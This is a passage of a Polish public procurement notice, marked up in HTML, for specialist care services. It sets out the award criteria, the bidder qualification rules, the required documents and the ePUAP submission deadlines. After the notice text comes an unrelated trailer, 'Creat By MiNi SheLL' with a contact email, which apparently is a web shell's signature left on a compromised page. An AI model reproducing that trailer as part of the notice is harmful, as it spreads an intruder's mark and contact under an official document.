podobną otrzyma 4 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium stażu pracy (SP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium doświadczenia (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z SWZ: <br/><br/>9.2.2.1. Zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie wyznacza warunku w tym zakresie.<br/><br/>9.2.2.2. Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/>- Zamawiający nie wyznacza warunku w tym zakresie.<br/><br/>9.2.2.3. Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną, nie niższą niż 50 000,00 zł.<br/>W odniesieniu do podmiotów występujących wspólnie (konsorcium) ww. warunek może być spełniony łącznie. Jeżeli po zsumowaniu potencjału wszystkich członków konsorcjum, warunek opisany przez zamawiającego zostanie spełniony przez wszystkich konsorcjantów łącznie, zamawiający stwierdzi, że konsorcjum jako wykonawca potwierdziło spełnienie warunku udziału w postępowaniu.  <br/>W celu wykazania spełnienia ww. warunku, wykonawca/wykonawcy wspólnie ubiegający się o udzielenie zamówienia odpowiednio wypełnią w oświadczenie stanowiące Załącznik nr 3 do SWZ pn. Oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu. <br/><br/>W celu wykazania spełnienia ww. warunku, wykonawca odpowiednio wypełni w oświadczeniu wykonawcy, stanowiącym Załącznik nr 3 do SWZ pn. Oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu. <br/><br/>9.2.2.4. Zdolności technicznej lub zawodowej:<br/><br/>a) w zakresie wiedzy i doświadczenia:<br/><br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: posiada doświadczenie zawodowe, legitymując się wykonaniem lub wykonywaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, minimum jednej usługi podobnej do usługi objętej przedmiotem zamówienia ( jedna usługa = jedna umowa).<br/>	Za usługę podobną Zamawiający uzna: usługę w zakresie świadczenia <br/>specjalistycznych usług opiekuńczych , realizowaną w sposób ciągły w ramach jednej umowy przez okres co najmniej 6 miesięcy (licząc do upływu terminu składania ofert), a wartość każdej usługi (umowy) nie mniejsza niż 50 000,00zł brutto oraz załączy do oferty dowody, że usługi wymienione przez Wykonawcę w wykazie zostały wykonane lub są wykonywane należycie. <br/>	Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu ( załącznik nr 3 do SWZ) oraz oświadczenia / wykaz usług ( załącznik nr 7 do SWZ), metodą graniczną spełnia – nie spełnia.<br/> <br/>* Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunek Wykonawca spełnił.<br/> b) w zakresie dysponowania osobami zdolnymi do wykonania zamówienia:<br/><br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na potrzeby realizacji zamówienia:<br/><br/>- minimum trzema (3) osobami, niekaranymi, posiadającymi wykształcenie co najmniej średnie i uprawnienia do wykonywania zawodu pielęgniarki<br/><br/>* Osoby świadczące specjalistyczne usługi opiekuńcze winny biegłe posługiwać się językiem polskim (co rozumiane jest jako sprawne i skuteczne komunikowanie się z osobami korzystającymi z usług, z osobami z ich otoczenia, personelem medycznym i pomocy społecznej). Ponadto osoby świadczące usługi powinny posiadać umiejętność sprawnego i rzetelnego prowadzenia w języku polskim dokumentacji. <br/><br/>Ocena spełnienia warunku na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu ( załącznik nr 3 do SWZ) oraz oświadczenia / wykaz osób ( załącznik nr 6 do SWZ), metodą graniczną spełnia – nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie<br/>żądał przedłożenia podmiotowych środków dowodowych w celu potwierdzenia braku podstaw do wykluczenia wskazanych w art.<br/>108 ust. 1 pkt 5-6 oraz art. 109 ust. 1 pkt 4 ustawy Pzp, z tym zastrzeżeniem, że jeżeli jest to niezbędne do zapewnienia<br/>odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na każdym etapie postępowania, wezwać<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, a jeżeli<br/>zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, zamawiający<br/>może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie żądał przedłożenia podmiotowych środków dowodowych w celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>- Dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wskazaną w Załączniku nr 3 do SWZ pn. Oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu; W tym zakresie Wykonawca zobowiązany jest przedstawić do wglądu polisę ubezpieczeniową wraz z dowodem jej opłacenia.<br/>Zamawiający będzie żądał przedłożenia oświadczenie oraz aktualnej na dzień złożenia informacji z KRS oraz statutu, lub innych odpowiednich dokumentów potwierdzających zgodnie z przepisami, że wykonawca (każdy wykonawca) jest podmiotem, o którym mowa w art. 94 ust. 1 ustawy, ze wskazaniem procentowego wskaźnika zatrudnienia osób, dla potwierdzenia spełnienia zastrzeżenia opisanego w punkcie 9.1.1. SWZ, a ponadto - w przypadku Wykonawców innych niż spółdzielnie socjalne - dokumentu potwierdzającego pozostawanie podmiotem mającym status zakładu pracy chronionej, lub cechy podmiotu którego głównym celem lub głównym celem działalności ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych wskazanych w pkt 9.1.1. SWZ ( np. zaświadczenie od wojewody o wpisie do rejestru Przedsiębiorstw społecznych). Wzór oświadczenia stanowi Załącznik nr 10 pn. Oświadczenie o spełnieniu warunku z art. 94 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje składania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Szczegółowe informacje na temat dokumentów wymaganych przez Zamawiającego, ich formy i sposobu składania<br/>zawierają:<br/>Rozdział 9. Warunki udziału w postępowaniu<br/>Rozdział 10. Podstawy wykluczenia<br/>Rozdział 11. Oferta, oświadczenie i dokumenty składane wraz z ofertą, w tym oświadczenia potwierdzające spełnienie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia; podmiotowe środki dowodowe<br/>Rozdział 17. Opis sposobu przygotowania i składania ofert<br/>Rozdział 21. Informacje o formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w<br/>sprawie zamówienia publicznego<br/><br/>W TERMINIE SKŁADANIA OFERT NALEŻY ZŁOŻYĆ NASTĘPUJĄCE DOKUMENTY:<br/> 1) OFERTĘ, na którą składają się:<br/> • Formularz Oferty - wzór stanowi Załącznik nr 2 do SWZ pn. Formularz oferty<br/>2) OŚWIADCZENIE O SPEŁNIENIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU I NIEPODLEGANIU WYKLUCZENIU – wzór stanowi Załącznik nr 3 do SWZ pn. Oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu.<br/>3) Załącznik nr 6 pn. Wykaz osób <br/>4) Załącznik nr 7 pn. Wykaz usług <br/>5) Zobowiązanie podmiotu udostępniającego zasoby oraz oświadczenie o spełnieniu warunków udziału w postępowaniu i nie podleganiu wykluczeniu (jeżeli dotyczy)- wzór stanowi Załącznik nr 4 do SWZ pn. Zobowiązanie podmiotu trzeciego. <br/>6) Oświadczenie wskazane w art. 117 ust. 4 ustawy Pzp (jeżeli dotyczy)- wzór stanowi Załącznik nr 5 pn. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia podpisuje podmiot występujący w imieniu wspólnie ubiegających się o udzielenie zamówienia. <br/>5) Dokument potwierdzający umocowanie do występowania w imieniu tych podmiotów, tj. Pełnomocnictwo, wyciąg z właściwego rejestru (np. z Rejestru przedsiębiorców KRS) z którego wynika to prawo.<br/>DOKUMENTY SKŁADANE PO DOKONANIU OCENY OFERT, NA WEZWANIE ZAMAWIAJĄCEGO:<br/>1) Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną wskazaną w Załączniku nr 3 do SWZ pn. Oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu; W tym zakresie Wykonawca zobowiązany jest przedstawić do wglądu polisę ubezpieczeniową wraz z dowodem jej opłacenia.<br/>2) Oświadczenia oraz aktualnej na dzień złożenia informacji z KRS oraz statutu, lub innych odpowiednich dokumentów potwierdzających zgodnie z przepisami, że wykonawca (każdy wykonawca) jest podmiotem, o którym mowa w art. 94 ust. 1 ustawy, ze wskazaniem procentowego wskaźnika zatrudnienia osób, dla potwierdzenia spełnienia zastrzeżenia opisanego w punkcie 9.1.1. SWZ, a ponadto - w przypadku Wykonawców innych niż spółdzielnie socjalne - dokumentu potwierdzającego pozostawanie podmiotem mającym status zakładu pracy chronionej, lub cechy podmiotu którego głównym celem lub głównym celem działalności ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych wskazanych w pkt 9.1.1. SWZ ( np. zaświadczenie od wojewody o wpisie do rejestru Przedsiębiorstw społecznych). Wzór oświadczenia stanowi Załącznik nr 10 pn. Oświadczenie o spełnieniu warunku z art. 94 ust. 1 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami Rozdziału 12. SWZ: Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>12.2. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie<br/>może podlegać wykluczeniu z powodów, o których mowa w Rozdziale 10 SWZ. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>Wykonawcy składający ofertę wspólną, ponoszą solidarną odpowiedzialność za realizację umowy. Jeżeli oferta<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana jako najkorzystniejsza, zamawiający<br/>wymaga przedłożenia kopii umowy regulującej współpracę tych wykonawców, przed zawarciem umowy w sprawie<br/>zamówienia publicznego.<br/>Ponadto w Rozdziale 9. Warunki udziału w postępowaniu, Rozdziale 11. Oferta, oświadczenie i dokumenty składane wraz z<br/>Ogłoszenie nr 2022/BZP 00465910/01 z dnia 2022-11-29<br/>2022-11-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>ofertą, w tym oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia;<br/>podmiotowe środki dowodowe oraz Rozdziale 17. Opis sposobu przygotowania i składania ofert, Rozdziale 21. Informacje o<br/>formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia<br/>publicznego – znajdują się dodatkowe, szczegółowe informacje dotyczące podmiotów wspólnie ubiegających się o<br/>udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wskazano w Załączniku nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert będzie następować przy użyciu platformy ePUAP, dostępnej pod adresem „https://epuap.gov.pl/wps/portal” oraz dostępnej również na miniPortalu pod adresem https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Postępowanie prowadzone jest z wykorzystaniem miniPortalu i narzędzi dostępnych na tym portalu oraz narzędzi ePUAP.<br/>Każdy Wykonawca biorący udział w postępowaniu zobowiązany jest do sprawdzania swojej skrzynki ePUAP ( z której złożył<br/>ofertę lub innej, którą wskazał, jako adres do doreczeń; ryzyko prawidłowego wskazania adresu skrzynki ePUAP obciąża<br/>Wykonawcę). Na tą skrzynkę będzie kierowana cała korespondencja dotycząca zamówienia, z zastrzeżeniem wyjątków<br/>wskazanych w SWZ.<br/>2. Zamawiający – stosownie do treści art. 95 ustawy Pzp - wymaga, aby osoby wykonujące czynności związane z<br/>wykonywaniem zamówienia objętego niniejszym postępowaniem, w postaci czynności administracyjnych i<br/>koordynacyjnych, były w okresie realizacji umowy zatrudnione na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia<br/>26 czerwca 1974 roku Kodeks pracy (t.j. Dz. U. z 2022 r., poz.1510 z późn. zm.), jeżeli wykonywanie tych czynności polega<br/>na wykonywaniu pracy w rozumieniu art. 22 § 1 k.p.<br/>Jeżeli wykonanie czynności, o których wyżej mowa, nie polega na wykonywaniu pracy w sposób określony w art. 22 § 1<br/>k.p., Wykonawca winien to udowodnić Zamawiającemu składając stosowne oświadczenie wraz z uzasadnieniem.<br/>Wymóg zatrudnienia na umowę o pracę, o którym mowa wyżej SWZ, gdy czynności zostaną powierzone osobom fizycznym<br/>prowadzącym działalność gospodarczą, które czynności będą wykonywać osobiście na podstawie łączącego je z<br/>wykonawcą stosunku cywilnoprawnego. Zamawiający nie narzuca wymiaru etatu, na jaki ma lub mają być zatrudnione<br/>osoby wykonujące czynności wskazane w pkt. 7.6.1) SWZ.<br/>3. Wyłoniony Wykonawca zobowiązany jest realizować przedmiot zamówienia zgodnie z wymaganiami w zakresie<br/>elektromobilności, co oznacza, że udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie<br/>użytkowanych pojazdów przy wykonywaniu zamówienia, będzie wynosił co najmniej 10% zgodnie z art. 68 ust. 3 ustawy z<br/>dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (t.j. Dz. U. z 2022 r., poz. 1083 z późn. zm.). W<br/>przypadku zmiany ww. ustawy w zakresie terminu lub poziomu zapewnienia udziału pojazdów elektrycznych lub pojazdów<br/>napędzanych gazem ziemnym, wymagania w zakresie elektromobilności określone w umowie stosuje się z uwzględnieniem<br/>zmian ww. ustawy.<br/>Przy obliczaniu procentowego udziału pojazdów samochodowych elektrycznych lub pojazdów samochodowych<br/>napędzanych gazem ziemnym, o których mowa w ppkt 1 należy uwzględnić zasadę, zgodnie z którą wielkość tego udziału<br/>poniżej 0,5 zaokrągla się w dół, a wielkość tego udziału 0,5 i powyżej zaokrągla się w górę.

Creat By MiNi SheLL
Email: jattceo@gmail.com